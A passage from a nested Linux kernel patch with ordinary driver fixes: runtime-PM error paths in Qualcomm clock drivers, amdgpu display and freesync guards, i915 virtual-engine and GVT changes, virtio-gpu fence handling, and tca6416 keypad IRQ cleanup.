++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops mss_sc7180_pm_ops = {
+diff --git a/drivers/clk/qcom/q6sstop-qcs404.c b/drivers/clk/qcom/q6sstop-qcs404.c
+index 780074e05841b..26e2d63614ac3 100644
+--- a/drivers/clk/qcom/q6sstop-qcs404.c
++++ b/drivers/clk/qcom/q6sstop-qcs404.c
+@@ -174,21 +174,32 @@ static int q6sstopcc_qcs404_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	q6sstop_regmap_config.name = "q6sstop_tcsr";
+ 	desc = &tcsr_qcs404_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		return ret;
++		goto err_put_rpm;
+ 
+ 	q6sstop_regmap_config.name = "q6sstop_cc";
+ 	desc = &q6sstop_qcs404_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+ 	if (ret)
+-		return ret;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops q6sstopcc_pm_ops = {
+diff --git a/drivers/clk/qcom/turingcc-qcs404.c b/drivers/clk/qcom/turingcc-qcs404.c
+index 43184459228fd..2cd288d6c3e4d 100644
+--- a/drivers/clk/qcom/turingcc-qcs404.c
++++ b/drivers/clk/qcom/turingcc-qcs404.c
+@@ -125,11 +125,22 @@ static int turingcc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = pm_runtime_resume_and_get(&pdev->dev);
++	if (ret)
++		return ret;
++
+ 	ret = qcom_cc_probe(pdev, &turingcc_desc);
+ 	if (ret < 0)
+-		return ret;
++		goto err_put_rpm;
++
++	pm_runtime_put(&pdev->dev);
+ 
+ 	return 0;
++
++err_put_rpm:
++	pm_runtime_put_sync(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops turingcc_pm_ops = {
+diff --git a/drivers/clocksource/arm_arch_timer.c b/drivers/clocksource/arm_arch_timer.c
+index 933bb960490d0..239c70ac120e8 100644
+--- a/drivers/clocksource/arm_arch_timer.c
++++ b/drivers/clocksource/arm_arch_timer.c
+@@ -773,6 +773,13 @@ static __always_inline void set_next_event_mem(const int access, unsigned long e
+ 	u64 cnt;
+ 
+ 	ctrl = arch_timer_reg_read(access, ARCH_TIMER_REG_CTRL, clk);
++
++	/* Timer must be disabled before programming CVAL */
++	if (ctrl & ARCH_TIMER_CTRL_ENABLE) {
++		ctrl &= ~ARCH_TIMER_CTRL_ENABLE;
++		arch_timer_reg_write(access, ARCH_TIMER_REG_CTRL, ctrl, clk);
++	}
++
+ 	ctrl |= ARCH_TIMER_CTRL_ENABLE;
+ 	ctrl &= ~ARCH_TIMER_CTRL_IT_MASK;
+ 
+diff --git a/drivers/dma/sh/rz-dmac.c b/drivers/dma/sh/rz-dmac.c
+index 476847a4916b9..2967141f4e7b2 100644
+--- a/drivers/dma/sh/rz-dmac.c
++++ b/drivers/dma/sh/rz-dmac.c
+@@ -9,6 +9,7 @@
+  * Copyright 2012 Javier Martin, Vista Silicon <javier.martin@vista-silicon.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/dmaengine.h>
+ #include <linux/interrupt.h>
+@@ -145,8 +146,8 @@ struct rz_dmac {
+ #define CHCFG_REQD			BIT(3)
+ #define CHCFG_SEL(bits)			((bits) & 0x07)
+ #define CHCFG_MEM_COPY			(0x80400008)
+-#define CHCFG_FILL_DDS(a)		(((a) << 16) & GENMASK(19, 16))
+-#define CHCFG_FILL_SDS(a)		(((a) << 12) & GENMASK(15, 12))
++#define CHCFG_FILL_DDS_MASK		GENMASK(19, 16)
++#define CHCFG_FILL_SDS_MASK		GENMASK(15, 12)
+ #define CHCFG_FILL_TM(a)		(((a) & BIT(5)) << 22)
+ #define CHCFG_FILL_AM(a)		(((a) & GENMASK(4, 2)) << 6)
+ #define CHCFG_FILL_LVL(a)		(((a) & BIT(1)) << 5)
+@@ -609,13 +610,15 @@ static int rz_dmac_config(struct dma_chan *chan,
+ 	if (val == CHCFG_DS_INVALID)
+ 		return -EINVAL;
+ 
+-	channel->chcfg |= CHCFG_FILL_DDS(val);
++	channel->chcfg &= ~CHCFG_FILL_DDS_MASK;
++	channel->chcfg |= FIELD_PREP(CHCFG_FILL_DDS_MASK, val);
+ 
+ 	val = rz_dmac_ds_to_val_mapping(config->src_addr_width);
+ 	if (val == CHCFG_DS_INVALID)
+ 		return -EINVAL;
+ 
+-	channel->chcfg |= CHCFG_FILL_SDS(val);
++	channel->chcfg &= ~CHCFG_FILL_SDS_MASK;
++	channel->chcfg |= FIELD_PREP(CHCFG_FILL_SDS_MASK, val);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index dd6f9ae6fbe9f..2fced451f0aea 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -38,6 +38,8 @@
+ #include <linux/pci.h>
+ #include <linux/pm_runtime.h>
+ #include <drm/drm_crtc_helper.h>
++#include <drm/drm_damage_helper.h>
++#include <drm/drm_drv.h>
+ #include <drm/drm_edid.h>
+ #include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_fb_helper.h>
+@@ -493,11 +495,29 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	return true;
+ }
+ 
++static int amdgpu_dirtyfb(struct drm_framebuffer *fb, struct drm_file *file,
++			  unsigned int flags, unsigned int color,
++			  struct drm_clip_rect *clips, unsigned int num_clips)
++{
++
++	if (file)
++		return -ENOSYS;
++
++	return drm_atomic_helper_dirtyfb(fb, file, flags, color, clips,
++					 num_clips);
++}
++
+ static const struct drm_framebuffer_funcs amdgpu_fb_funcs = {
+ 	.destroy = drm_gem_fb_destroy,
+ 	.create_handle = drm_gem_fb_create_handle,
+ };
+ 
++static const struct drm_framebuffer_funcs amdgpu_fb_funcs_atomic = {
++	.destroy = drm_gem_fb_destroy,
++	.create_handle = drm_gem_fb_create_handle,
++	.dirty = amdgpu_dirtyfb
++};
++
+ uint32_t amdgpu_display_supported_domains(struct amdgpu_device *adev,
+ 					  uint64_t bo_flags)
+ {
+@@ -1100,7 +1120,11 @@ static int amdgpu_display_gem_fb_verify_and_init(struct drm_device *dev,
+ 	if (ret)
+ 		goto err;
+ 
+-	ret = drm_framebuffer_init(dev, &rfb->base, &amdgpu_fb_funcs);
++	if (drm_drv_uses_atomic_modeset(dev))
++		ret = drm_framebuffer_init(dev, &rfb->base,
++					   &amdgpu_fb_funcs_atomic);
++	else
++		ret = drm_framebuffer_init(dev, &rfb->base, &amdgpu_fb_funcs);
+ 
+ 	if (ret)
+ 		goto err;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+index 3c50b3ff79541..cd6e99cf74a06 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_plane.c
+@@ -1269,6 +1269,13 @@ void handle_cursor_update(struct drm_plane *plane,
+ 	attributes.rotation_angle    = 0;
+ 	attributes.attribute_flags.value = 0;
+ 
++	/* Enable cursor degamma ROM on DCN3+ for implicit sRGB degamma in DRM
++	 * legacy gamma setup.
++	 */
++	if (crtc_state->cm_is_degamma_srgb &&
++	    adev->dm.dc->caps.color.dpp.gamma_corr)
++		attributes.attribute_flags.bits.ENABLE_CURSOR_DEGAMMA = 1;
++
+ 	attributes.pitch = afb->base.pitches[0] / afb->base.format->cpp[0];
+ 
+ 	if (crtc_state->stream) {
+diff --git a/drivers/gpu/drm/amd/display/dc/Makefile b/drivers/gpu/drm/amd/display/dc/Makefile
+index b9effadfc4bb7..89da06033332b 100644
+--- a/drivers/gpu/drm/amd/display/dc/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/Makefile
+@@ -82,3 +82,4 @@ DC_EDID += dc_edid_parser.o
+ AMD_DISPLAY_DMUB = $(addprefix $(AMDDALPATH)/dc/,$(DC_DMUB))
+ AMD_DISPLAY_EDID = $(addprefix $(AMDDALPATH)/dc/,$(DC_EDID))
+ AMD_DISPLAY_FILES += $(AMD_DISPLAY_DMUB) $(AMD_DISPLAY_EDID)
++
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 674ab6d9b31e4..16c05a24ac7aa 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1977,12 +1977,12 @@ enum dc_status dc_commit_streams(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* Check for case where we are going from odm 2:1 to max
+-	 *  pipe scenario.  For these cases, we will call
+-	 *  commit_minimal_transition_state() to exit out of odm 2:1
+-	 *  first before processing new streams
++	/* ODM Combine 2:1 power optimization is only applied for single stream
++	 * scenario, it uses extra pipes than needed to reduce power consumption
++	 * We need to switch off this feature to make room for new streams.
+ 	 */
+-	if (stream_count == dc->res_pool->pipe_count) {
++	if (stream_count > dc->current_state->stream_count &&
++			dc->current_state->stream_count == 1) {
+ 		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+ 			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
+ 			if (pipe->next_odm_pipe)
+@@ -3361,6 +3361,45 @@ void dc_dmub_update_dirty_rect(struct dc *dc,
+ 	}
+ }
+ 
++static void wait_for_outstanding_hw_updates(struct dc *dc, const struct dc_state *dc_context)
++{
++/*
++ * This function calls HWSS to wait for any potentially double buffered
++ * operations to complete. It should be invoked as a pre-amble prior
++ * to full update programming before asserting any HW locks.
++ */
++	int pipe_idx;
++	int opp_inst;
++	int opp_count = dc->res_pool->pipe_count;
++	struct hubp *hubp;
++	int mpcc_inst;
++	const struct pipe_ctx *pipe_ctx;
++
++	for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++		pipe_ctx = &dc_context->res_ctx.pipe_ctx[pipe_idx];
++
++		if (!pipe_ctx->stream)
++			continue;
++
++		if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++			pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++
++		hubp = pipe_ctx->plane_res.hubp;
++		if (!hubp)
++			continue;
++
++		mpcc_inst = hubp->inst;
++		// MPCC inst is equal to pipe index in practice
++		for (opp_inst = 0; opp_inst < opp_count; opp_inst++) {
++			if (dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst]) {
++				dc->res_pool->mpc->funcs->wait_for_idle(dc->res_pool->mpc, mpcc_inst);
++				dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst] = false;
++				break;
++			}
++		}
++	}
++}
++
+ static void commit_planes_for_stream(struct dc *dc,
+ 		struct dc_surface_update *srf_updates,
+ 		int surface_count,
+@@ -3378,24 +3417,9 @@ static void commit_planes_for_stream(struct dc *dc,
+ 	// dc->current_state anymore, so we have to cache it before we apply
+ 	// the new SubVP context
+ 	subvp_prev_use = false;
+-
+-
+ 	dc_z10_restore(dc);
+-
+-	if (update_type == UPDATE_TYPE_FULL) {
+-		/* wait for all double-buffer activity to clear on all pipes */
+-		int pipe_idx;
+-
+-		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
+-			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
+-
+-			if (!pipe_ctx->stream)
+-				continue;
+-
+-			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
+-				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
+-		}
+-	}
++	if (update_type == UPDATE_TYPE_FULL)
++		wait_for_outstanding_hw_updates(dc, context);
+ 
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
+index 8e9384094f6d6..f2f55565e98a4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_mpc.c
+@@ -212,8 +212,9 @@ struct mpcc *mpc1_insert_plane(
+ 		/* check insert_above_mpcc exist in tree->opp_list */
+ 		struct mpcc *temp_mpcc = tree->opp_list;
+ 
+-		while (temp_mpcc && temp_mpcc->mpcc_bot != insert_above_mpcc)
+-			temp_mpcc = temp_mpcc->mpcc_bot;
++		if (temp_mpcc != insert_above_mpcc)
++			while (temp_mpcc && temp_mpcc->mpcc_bot != insert_above_mpcc)
++				temp_mpcc = temp_mpcc->mpcc_bot;
+ 		if (temp_mpcc == NULL)
+ 			return NULL;
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index 4ef632864948e..fbc188812ccc9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1515,17 +1515,6 @@ static void dcn20_update_dchubp_dpp(
+ 			|| plane_state->update_flags.bits.global_alpha_change
+ 			|| plane_state->update_flags.bits.per_pixel_alpha_change) {
+ 		// MPCC inst is equal to pipe index in practice
+-		int mpcc_inst = hubp->inst;
+-		int opp_inst;
+-		int opp_count = dc->res_pool->pipe_count;
+-
+-		for (opp_inst = 0; opp_inst < opp_count; opp_inst++) {
+-			if (dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst]) {
+-				dc->res_pool->mpc->funcs->wait_for_idle(dc->res_pool->mpc, mpcc_inst);
+-				dc->res_pool->opps[opp_inst]->mpcc_disconnect_pending[mpcc_inst] = false;
+-				break;
+-			}
+-		}
+ 		hws->funcs.update_mpcc(dc, pipe_ctx);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/modules/freesync/freesync.c b/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
+index 0f39ab9dc5b41..9e74b6e8b5732 100644
+--- a/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
++++ b/drivers/gpu/drm/amd/display/modules/freesync/freesync.c
+@@ -338,7 +338,9 @@ static void apply_below_the_range(struct core_freesync *core_freesync,
+ 		 *  - Delta for CEIL: delta_from_mid_point_in_us_1
+ 		 *  - Delta for FLOOR: delta_from_mid_point_in_us_2
+ 		 */
+-		if ((last_render_time_in_us / mid_point_frames_ceil) < in_out_vrr->min_duration_in_us) {
++		if (mid_point_frames_ceil &&
++		    (last_render_time_in_us / mid_point_frames_ceil) <
++		    in_out_vrr->min_duration_in_us) {
+ 			/* Check for out of range.
+ 			 * If using CEIL produces a value that is out of range,
+ 			 * then we are forced to use FLOOR.
+@@ -385,8 +387,9 @@ static void apply_below_the_range(struct core_freesync *core_freesync,
+ 		/* Either we've calculated the number of frames to insert,
+ 		 * or we need to insert min duration frames
+ 		 */
+-		if (last_render_time_in_us / frames_to_insert <
+-				in_out_vrr->min_duration_in_us){
++		if (frames_to_insert &&
++		    (last_render_time_in_us / frames_to_insert) <
++		    in_out_vrr->min_duration_in_us){
+ 			frames_to_insert -= (frames_to_insert > 1) ?
+ 					1 : 0;
+ 		}
+diff --git a/drivers/gpu/drm/ast/ast_post.c b/drivers/gpu/drm/ast/ast_post.c
+index 82fd3c8adee13..5b2c2b7745bf0 100644
+--- a/drivers/gpu/drm/ast/ast_post.c
++++ b/drivers/gpu/drm/ast/ast_post.c
+@@ -291,7 +291,7 @@ static void ast_init_dram_reg(struct drm_device *dev)
+ 				;
+ 			} while (ast_read32(ast, 0x10100) != 0xa8);
+ 		} else {/* AST2100/1100 */
+-			if (ast->chip == AST2100 || ast->chip == 2200)
++			if (ast->chip == AST2100 || ast->chip == AST2200)
+ 				dram_reg_info = ast2100_dram_table_data;
+ 			else
+ 				dram_reg_info = ast1100_dram_table_data;
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_types.h b/drivers/gpu/drm/i915/gt/intel_engine_types.h
+index 6b5d4ea22b673..107f465a27b9e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_types.h
++++ b/drivers/gpu/drm/i915/gt/intel_engine_types.h
+@@ -56,6 +56,7 @@ struct intel_breadcrumbs;
+ 
+ typedef u32 intel_engine_mask_t;
+ #define ALL_ENGINES ((intel_engine_mask_t)~0ul)
++#define VIRTUAL_ENGINES BIT(BITS_PER_TYPE(intel_engine_mask_t) - 1)
+ 
+ struct intel_hw_status_page {
+ 	struct list_head timelines;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+index 0ec07dad1dcf1..fecdc7ea78ebd 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_submission.c
+@@ -5111,6 +5111,9 @@ guc_create_virtual(struct intel_engine_cs **siblings, unsigned int count,
+ 
+ 	ve->base.flags = I915_ENGINE_IS_VIRTUAL;
+ 
++	BUILD_BUG_ON(ilog2(VIRTUAL_ENGINES) < I915_NUM_ENGINES);
++	ve->base.mask = VIRTUAL_ENGINES;
++
+ 	intel_context_init(&ve->context, &ve->base);
+ 
+ 	for (n = 0; n < count; n++) {
+diff --git a/drivers/gpu/drm/i915/gvt/gtt.c b/drivers/gpu/drm/i915/gvt/gtt.c
+index 80c60754a5c1c..79bf1be68d8cf 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.c
++++ b/drivers/gpu/drm/i915/gvt/gtt.c
+@@ -1179,6 +1179,7 @@ static int is_2MB_gtt_possible(struct intel_vgpu *vgpu,
+ {
+ 	const struct intel_gvt_gtt_pte_ops *ops = vgpu->gvt->gtt.pte_ops;
+ 	kvm_pfn_t pfn;
++	int ret;
+ 
+ 	if (!HAS_PAGE_SIZES(vgpu->gvt->gt->i915, I915_GTT_PAGE_SIZE_2M))
+ 		return 0;
+@@ -1188,7 +1189,13 @@ static int is_2MB_gtt_possible(struct intel_vgpu *vgpu,
+ 	pfn = gfn_to_pfn(vgpu->vfio_device.kvm, ops->get_pfn(entry));
+ 	if (is_error_noslot_pfn(pfn))
+ 		return -EINVAL;
+-	return PageTransHuge(pfn_to_page(pfn));
++
++	if (!pfn_valid(pfn))
++		return -EINVAL;
++
++	ret = PageTransHuge(pfn_to_page(pfn));
++	kvm_release_pfn_clean(pfn);
++	return ret;
+ }
+ 
+ static int split_2MB_gtt_entry(struct intel_vgpu *vgpu,
+@@ -2880,24 +2887,6 @@ void intel_vgpu_reset_ggtt(struct intel_vgpu *vgpu, bool invalidate_old)
+ 	ggtt_invalidate(gvt->gt);
+ }
+ 
+-/**
+- * intel_vgpu_reset_gtt - reset the all GTT related status
+- * @vgpu: a vGPU
+- *
+- * This function is called from vfio core to reset reset all
+- * GTT related status, including GGTT, PPGTT, scratch page.
+- *
+- */
+-void intel_vgpu_reset_gtt(struct intel_vgpu *vgpu)
+-{
+-	/* Shadow pages are only created when there is no page
+-	 * table tracking data, so remove page tracking data after
+-	 * removing the shadow pages.
+-	 */
+-	intel_vgpu_destroy_all_ppgtt_mm(vgpu);
+-	intel_vgpu_reset_ggtt(vgpu, true);
+-}
+-
+ /**
+  * intel_gvt_restore_ggtt - restore all vGPU's ggtt entries
+  * @gvt: intel gvt device
+diff --git a/drivers/gpu/drm/i915/gvt/gtt.h b/drivers/gpu/drm/i915/gvt/gtt.h
+index a3b0f59ec8bd9..4cb183e06e95a 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.h
++++ b/drivers/gpu/drm/i915/gvt/gtt.h
+@@ -224,7 +224,6 @@ void intel_vgpu_reset_ggtt(struct intel_vgpu *vgpu, bool invalidate_old);
+ void intel_vgpu_invalidate_ppgtt(struct intel_vgpu *vgpu);
+ 
+ int intel_gvt_init_gtt(struct intel_gvt *gvt);
+-void intel_vgpu_reset_gtt(struct intel_vgpu *vgpu);
+ void intel_gvt_clean_gtt(struct intel_gvt *gvt);
+ 
+ struct intel_vgpu_mm *intel_gvt_find_ppgtt_mm(struct intel_vgpu *vgpu,
+diff --git a/drivers/gpu/drm/i915/i915_request.c b/drivers/gpu/drm/i915/i915_request.c
+index 803cd2ad4deb5..7ce126a01cbf6 100644
+--- a/drivers/gpu/drm/i915/i915_request.c
++++ b/drivers/gpu/drm/i915/i915_request.c
+@@ -134,9 +134,7 @@ static void i915_fence_release(struct dma_fence *fence)
+ 	i915_sw_fence_fini(&rq->semaphore);
+ 
+ 	/*
+-	 * Keep one request on each engine for reserved use under mempressure
+-	 * do not use with virtual engines as this really is only needed for
+-	 * kernel contexts.
++	 * Keep one request on each engine for reserved use under mempressure.
+ 	 *
+ 	 * We do not hold a reference to the engine here and so have to be
+ 	 * very careful in what rq->engine we poke. The virtual engine is
+@@ -166,8 +164,7 @@ static void i915_fence_release(struct dma_fence *fence)
+ 	 * know that if the rq->execution_mask is a single bit, rq->engine
+ 	 * can be a physical engine with the exact corresponding mask.
+ 	 */
+-	if (!intel_engine_is_virtual(rq->engine) &&
+-	    is_power_of_2(rq->execution_mask) &&
++	if (is_power_of_2(rq->execution_mask) &&
+ 	    !cmpxchg(&rq->engine->request_pool, NULL, rq))
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/mxsfb/mxsfb_kms.c b/drivers/gpu/drm/mxsfb/mxsfb_kms.c
+index 3bcc9c0f20193..7ed2516b6de05 100644
+--- a/drivers/gpu/drm/mxsfb/mxsfb_kms.c
++++ b/drivers/gpu/drm/mxsfb/mxsfb_kms.c
+@@ -611,6 +611,14 @@ static void mxsfb_plane_overlay_atomic_update(struct drm_plane *plane,
+ 	writel(ctrl, mxsfb->base + LCDC_AS_CTRL);
+ }
+ 
++static void mxsfb_plane_overlay_atomic_disable(struct drm_plane *plane,
++					       struct drm_atomic_state *state)
++{
++	struct mxsfb_drm_private *mxsfb = to_mxsfb_drm_private(plane->dev);
++
++	writel(0, mxsfb->base + LCDC_AS_CTRL);
++}
++
+ static bool mxsfb_format_mod_supported(struct drm_plane *plane,
+ 				       uint32_t format,
+ 				       uint64_t modifier)
+@@ -626,6 +634,7 @@ static const struct drm_plane_helper_funcs mxsfb_plane_primary_helper_funcs = {
+ static const struct drm_plane_helper_funcs mxsfb_plane_overlay_helper_funcs = {
+ 	.atomic_check = mxsfb_plane_atomic_check,
+ 	.atomic_update = mxsfb_plane_overlay_atomic_update,
++	.atomic_disable = mxsfb_plane_overlay_atomic_disable,
+ };
+ 
+ static const struct drm_plane_funcs mxsfb_plane_funcs = {
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index da45215a933d0..bc8c1e9a845fd 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -43,13 +43,9 @@ static int virtio_gpu_fence_event_create(struct drm_device *dev,
+ 					 struct virtio_gpu_fence *fence,
+ 					 uint32_t ring_idx)
+ {
+-	struct virtio_gpu_fpriv *vfpriv = file->driver_priv;
+ 	struct virtio_gpu_fence_event *e = NULL;
+ 	int ret;
+ 
+-	if (!(vfpriv->ring_idx_mask & BIT_ULL(ring_idx)))
+-		return 0;
+-
+ 	e = kzalloc(sizeof(*e), GFP_KERNEL);
+ 	if (!e)
+ 		return -ENOMEM;
+@@ -121,6 +117,7 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 	struct virtio_gpu_device *vgdev = dev->dev_private;
+ 	struct virtio_gpu_fpriv *vfpriv = file->driver_priv;
+ 	struct virtio_gpu_fence *out_fence;
++	bool drm_fence_event;
+ 	int ret;
+ 	uint32_t *bo_handles = NULL;
+ 	void __user *user_bo_handles = NULL;
+@@ -216,15 +213,24 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 			goto out_memdup;
+ 	}
+ 
+-	out_fence = virtio_gpu_fence_alloc(vgdev, fence_ctx, ring_idx);
+-	if(!out_fence) {
+-		ret = -ENOMEM;
+-		goto out_unresv;
+-	}
++	if ((exbuf->flags & VIRTGPU_EXECBUF_RING_IDX) &&
++	    (vfpriv->ring_idx_mask & BIT_ULL(ring_idx)))
++		drm_fence_event = true;
++	else
++		drm_fence_event = false;
+ 
+-	ret = virtio_gpu_fence_event_create(dev, file, out_fence, ring_idx);
+-	if (ret)
+-		goto out_unresv;
++	if ((exbuf->flags & VIRTGPU_EXECBUF_FENCE_FD_OUT) ||
++	    exbuf->num_bo_handles ||
++	    drm_fence_event)
++		out_fence = virtio_gpu_fence_alloc(vgdev, fence_ctx, ring_idx);
++	else
++		out_fence = NULL;
++
++	if (drm_fence_event) {
++		ret = virtio_gpu_fence_event_create(dev, file, out_fence, ring_idx);
++		if (ret)
++			goto out_unresv;
++	}
+ 
+ 	if (out_fence_fd >= 0) {
+ 		sync_file = sync_file_create(&out_fence->f);
+diff --git a/drivers/hwspinlock/qcom_hwspinlock.c b/drivers/hwspinlock/qcom_hwspinlock.c
+index 9cf186362ae2f..3f08cd4a5c280 100644
+--- a/drivers/hwspinlock/qcom_hwspinlock.c
++++ b/drivers/hwspinlock/qcom_hwspinlock.c
+@@ -69,9 +69,18 @@ static const struct hwspinlock_ops qcom_hwspinlock_ops = {
+ 	.unlock		= qcom_hwspinlock_unlock,
+ };
+ 
++static const struct regmap_config sfpb_mutex_config = {
++	.reg_bits		= 32,
++	.reg_stride		= 4,
++	.val_bits		= 32,
++	.max_register		= 0x100,
++	.fast_io		= true,
++};
++
+ static const struct qcom_hwspinlock_of_data of_sfpb_mutex = {
+ 	.offset = 0x4,
+ 	.stride = 0x4,
++	.regmap_config = &sfpb_mutex_config,
+ };
+ 
+ static const struct regmap_config tcsr_msm8226_mutex_config = {
+diff --git a/drivers/input/keyboard/tca6416-keypad.c b/drivers/input/keyboard/tca6416-keypad.c
+index afcdfbb002ff3..9c1489c0dae13 100644
+--- a/drivers/input/keyboard/tca6416-keypad.c
++++ b/drivers/input/keyboard/tca6416-keypad.c
+@@ -148,7 +148,7 @@ static int tca6416_keys_open(struct input_dev *dev)
+ 	if (chip->use_polling)
+ 		schedule_delayed_work(&chip->dwork, msecs_to_jiffies(100));
+ 	else
+-		enable_irq(chip->irqnum);
++		enable_irq(chip->client->irq);
+ 
+ 	return 0;
+ }
+@@ -160,7 +160,7 @@ static void tca6416_keys_close(struct input_dev *dev)
+ 	if (chip->use_polling)
+ 		cancel_delayed_work_sync(&chip->dwork);
+ 	else
+-		disable_irq(chip->irqnum);
++		disable_irq(chip->client->irq);
+ }
+ 
+ static int tca6416_setup_registers(struct tca6416_keypad_chip *chip)
+@@ -266,12 +266,7 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 		goto fail1;
+ 
+ 	if (!chip->use_polling) {
+-		if (pdata->irq_is_gpio)
+-			chip->irqnum = gpio_to_irq(client->irq);
+-		else
+-			chip->irqnum = client->irq;
+-
+-		error = request_threaded_irq(chip->irqnum, NULL,
++		error = request_threaded_irq(client->irq, NULL,
+ 					     tca6416_keys_isr,
+ 					     IRQF_TRIGGER_FALLING |
+ 					     IRQF_ONESHOT | IRQF_NO_AUTOEN,
+@@ -279,7 +274,7 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 		if (error) {
+ 			dev_dbg(&client->dev,
+ 				"Unable to claim irq %d; error %d\n",
+-				chip->irqnum, error);
++				client->irq, error);
+ 			goto fail1;
+ 		}
+ 	}
+@@ -297,10 +292,8 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 	return 0;
+ 
+ fail2:
+-	if (!chip->use_polling) {
+-		free_irq(chip->irqnum, chip);
+-		enable_irq(chip->irqnum);
+-	}
++	if (!chip->use_polling)
++		free_irq(client->irq, chip);
+ fail1:
+ 	input_free_device(input);
+ 	kfree(chip);
+@@ -311,10 +304,8 @@ static void tca6416_keypad_remove(struct i2c_client *client)
+ {
+ 	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+-	if (!chip->use_polling) {
+-		free_irq(chip->irqnum, chip);
+-		enable_irq(chip->irqnum);
+-	}
++	if (!chip->use_polling)
++		free_irq(client->irq, chip);
+ 
+ 	input_unregister_device(chip->input);
+ 	kfree(chip);
+@@ -324,10 +315,9 @@ static void tca6416_keypad_remove(struct i2c_client *client)
+ static int tca6416_keypad_suspend(struct device *dev)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(chip->irqnum);
++		enable_irq_wake(client->irq);
+ 
+ 	return 0;
+ }
+@@ -335,10 +325,9 @@ static int tca6416_keypad_suspend(struct device *dev)
